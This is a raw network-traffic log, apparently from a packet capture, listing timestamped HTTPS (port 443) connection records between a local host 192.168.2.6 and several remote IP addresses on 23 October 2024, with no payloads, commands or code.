                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.765640974 CEST49750443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.765645981 CEST4434975013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.765655041 CEST49750443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.765659094 CEST4434975013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.767472982 CEST49761443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.767479897 CEST49760443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.767514944 CEST4434976013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.767524958 CEST4434976113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.767587900 CEST49760443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.767627954 CEST49761443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.767710924 CEST49761443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.767736912 CEST49760443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.767738104 CEST4434976113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.767751932 CEST4434976013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.777896881 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.777925014 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.777961016 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.778817892 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.779200077 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.779248953 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.779252052 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.779264927 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.779352903 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.779396057 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.779397964 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.779409885 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.779445887 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.779463053 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.779509068 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.779515028 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.789992094 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.807652950 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.807744980 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.807758093 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.807786942 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.807815075 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.807825089 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.807887077 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.808399916 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.808409929 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.808454990 CEST44349742141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.808507919 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.808523893 CEST49742443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.812025070 CEST49762443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.812074900 CEST44349762141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.812155008 CEST49762443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.812346935 CEST49762443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.812374115 CEST44349762141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.820571899 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.820597887 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.863163948 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.865122080 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.865148067 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.865212917 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.865242958 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.865252972 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.865295887 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.865304947 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.865546942 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.893696070 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.893809080 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.893848896 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.893909931 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.893944979 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.893984079 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.894025087 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.894026041 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.894100904 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.894149065 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.894843102 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.894920111 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.894937992 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.906327963 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.906414032 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.906421900 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.906446934 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.906491041 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.906491041 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.906606913 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.943887949 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.943895102 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.956679106 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.973608971 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.973643064 CEST44349754141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.973838091 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.973845959 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.974055052 CEST49754443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.974121094 CEST44349754141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.975156069 CEST44349754141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.975234985 CEST49754443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.975514889 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.975575924 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.978430986 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.978529930 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.978715897 CEST49754443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.978807926 CEST44349754141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.978867054 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.978873968 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.978945971 CEST49754443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.978964090 CEST44349754141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.983649969 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.983674049 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.983736992 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.983748913 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.983777046 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.983794928 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.983815908 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.983838081 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:02.994462013 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.007747889 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.008591890 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.008680105 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.008688927 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.008817911 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.008862972 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.008898020 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.008913994 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.008924007 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.008948088 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.009623051 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.010438919 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.010446072 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.019452095 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.021718979 CEST49754443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.054694891 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.070177078 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.070204020 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.070302010 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.070311069 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.073683023 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.090975046 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.091069937 CEST44349744184.28.90.27192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.091140985 CEST49744443192.168.2.6184.28.90.27
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.092905045 CEST49744443192.168.2.6184.28.90.27
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.092921972 CEST44349744184.28.90.27192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.093429089 CEST44349744184.28.90.27192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.102977037 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.103046894 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.103266954 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.103266954 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.103295088 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.103391886 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.106466055 CEST44349756141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.107897043 CEST49756443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.107922077 CEST44349756141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.108261108 CEST44349756141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.122582912 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.122726917 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.122725964 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.122798920 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.122819901 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.122859001 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.122879982 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.122911930 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.122927904 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.123028040 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.123122931 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.123171091 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.123181105 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.123222113 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.123228073 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.123433113 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.124702930 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.124758005 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.124876022 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.124924898 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.124934912 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.125127077 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.125175953 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.125219107 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.125226021 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.125233889 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.125258923 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.136904955 CEST49744443192.168.2.6184.28.90.27
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.140670061 CEST49756443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.140784979 CEST44349756141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.166273117 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.183773041 CEST44349754141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.183846951 CEST44349754141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.184068918 CEST49754443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.193666935 CEST49756443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.206111908 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.220062971 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.220132113 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.220269918 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.220271111 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.220345974 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.220408916 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.233139038 CEST49756443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.237716913 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.237780094 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.237905979 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.237905979 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.237941027 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.237989902 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.248996019 CEST49754443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.249068022 CEST44349754141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.250267029 CEST49755443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.250286102 CEST44349755141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.253350973 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.253360987 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.253395081 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.253405094 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.253416061 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.253437042 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.253469944 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.253494024 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.253506899 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.258676052 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.258753061 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.258770943 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.258826971 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.272490025 CEST49744443192.168.2.6184.28.90.27
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.279333115 CEST44349756141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.315349102 CEST44349744184.28.90.27192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.484515905 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.484596014 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.484626055 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.484699011 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.484739065 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.484765053 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.484791040 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.484947920 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485008001 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485016108 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485042095 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485052109 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485064983 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485084057 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485112906 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485124111 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485143900 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485168934 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485173941 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485200882 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485214949 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485224962 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485244989 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485286951 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485301018 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485368967 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485379934 CEST44349756141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485482931 CEST44349756141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.485584021 CEST49756443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.486038923 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.486097097 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.486114025 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.486129999 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.486162901 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.486207962 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.486224890 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.486264944 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.486280918 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.486308098 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.486993074 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.487059116 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.487198114 CEST44349762141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.487610102 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.487656116 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.487667084 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.487680912 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.487720966 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.488114119 CEST49756443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.488127947 CEST44349756141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.488565922 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.488621950 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.488637924 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.488706112 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.489100933 CEST44349753141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.489176035 CEST49753443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.490715027 CEST49762443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:03.490722895 CEST44349762141.193.213.11192.168.2.6
